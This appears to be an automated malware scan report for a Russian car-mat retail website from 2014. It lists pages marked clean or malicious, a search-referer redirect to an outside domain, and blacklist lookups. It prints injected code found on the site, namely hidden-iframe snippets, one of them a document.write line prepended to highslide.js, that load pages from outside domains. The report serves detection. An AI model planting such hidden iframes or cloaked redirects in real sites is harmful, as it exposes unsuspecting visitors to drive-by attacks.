Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.carline4u.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.carline4u.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 19 Jun 2014 21:50:06 GMT Location: http://hecodat.de/zwmd.html?h=1679670 Server: nginx/1.4.5 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.carline4u.ru/ | 200 OK Content-Length: 8888 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x18 src: http://mwola.com/post.php?id=889683 <iframe name=twitter scrolling=auto frameborder=no align=center height=18 width=1 src=http://mwola.com/post.php?id=889683> | ||
http://www.carline4u.ru/basket/ | 200 OK Content-Length: 7451 Content-Type: text/html | clean |
http://www.carline4u.ru/highslide/highslide.js | 200 OK Content-Length: 43008 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1679670></iframe>');
var hs = { graphicsDir : 'highslide/graphics/', restoreCursor : 'zoomout.cur', expandSteps : 10, expandDuration : 250, restoreSteps : 10, restoreDuration : 250, marginLeft : 15, marginRight : 15, marginTop : 15, marginBottom : 15, zIndexCounter : 1001, restoreTitle : 'Click to close imag hs.purge(this.wrapper); if (hs.ie && hs.ieVersion() < 5.5) this.wrapper.innerHTML = ''; else this.wrapper.parentNode.removeChild(this.wrapper); hs.expanders[this.key] = null; hs.cleanUp(); } }; var HsExpander = hs.Expander; hs.addEventListener(document, 'mousedown', hs.mouseClickHandler); hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(window, 'load', hs.preloadImages); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1679670 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1679670> | ||
http://www.carline4u.ru/delivery/ | 200 OK Content-Length: 9671 Content-Type: text/html | clean |
http://www.carline4u.ru/material/ | 200 OK Content-Length: 11979 Content-Type: text/html | clean |
http://www.carline4u.ru/about/ | 200 OK Content-Length: 7455 Content-Type: text/html | clean |
http://www.carline4u.ru/new_goods/ | 200 OK Content-Length: 7344 Content-Type: text/html | clean |
http://www.carline4u.ru/contacts/ | 200 OK Content-Length: 7815 Content-Type: text/html | clean |
http://www.carline4u.ru/ustanovka/ | 200 OK Content-Length: 7377 Content-Type: text/html | clean |
http://www.carline4u.ru/kovriki_v_salon_poliuretan/ | 200 OK Content-Length: 7800 Content-Type: text/html | clean |
http://www.carline4u.ru/rug_salon/ | 200 OK Content-Length: 10880 Content-Type: text/html | clean |
http://www.carline4u.ru/kovriki_v_bagazhnik_poliuretan/ | 200 OK Content-Length: 7825 Content-Type: text/html | clean |
http://www.carline4u.ru/rug_boot/ | 200 OK Content-Length: 10456 Content-Type: text/html | clean |
http://www.carline4u.ru/steel/ | 200 OK Content-Length: 7747 Content-Type: text/html | clean |
http://www.carline4u.ru/crankcase/ | 200 OK Content-Length: 12186 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=carline4u.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://carline4u.ru/
Result: carline4u.ru is not infected or malware details are not published yet.
Result: carline4u.ru is not infected or malware details are not published yet.